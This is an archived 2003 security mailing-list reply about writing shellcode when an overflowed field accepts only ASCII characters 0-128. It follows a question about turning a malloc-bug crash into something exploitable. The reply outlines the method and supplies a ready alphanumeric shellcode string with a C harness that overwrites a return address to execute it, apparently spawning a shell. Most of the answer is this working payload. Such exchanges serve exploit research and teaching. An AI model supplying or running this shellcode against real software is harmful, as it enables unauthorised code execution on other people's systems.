Re: shellcode with standard characters

[steve () uk intasys com]

On Thu, Jun 12, 2003 at 11:20:00AM +0200, JohnnyRun wrote:

> This is my first post and I'm looking for some documentation.
> A friend of mine has produced a segfault with malloc vulnerability on an
> application.

> We would like to produce something more interesting.
> The field overflowed can accept only characters between 0 and 128. Any
> other character is replaced with a whitespace.
>
> Can we inject shellcode with only this characters avaible?
> Can you suggest me documentation about shellcode writing?

  The simplest thing to do is to write a simple program that will run
 a shell in C, and generate the assembly output for it with GCC -s,
 this will give you a starting point.

  After that you must filter out the opcodes and values which contain
 invalid characters.  Using add's etc will save you some effort.

  Here's a simple sample:

  char shellcode[] =
   "DDDDTYTX3H01H01h03h0LLLLLLLLXPY3E01E01u03u0j0fXh8eshXf5VJPfhbi"
   "fhDefXf5AJfPDTYhKATYX5KATYPQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfX"
   "f3E0f1E0f1U0fh88fX0E1f1E0f3E0fPTRX49HHHQfPfYRX2E00E0BRX0E02E02"
   "L0z0L0zYRX4j4aGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
   "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
   "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
   "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG";

  int main()
  {
     int *ret;
     ret = (int *)&ret + 2;
     (*ret) = (int)shellcode;

     return 0;
 }

Steve
-- 
Steve Kemp <steve () uk intasys com>
Intasys Billing Technologies Ltd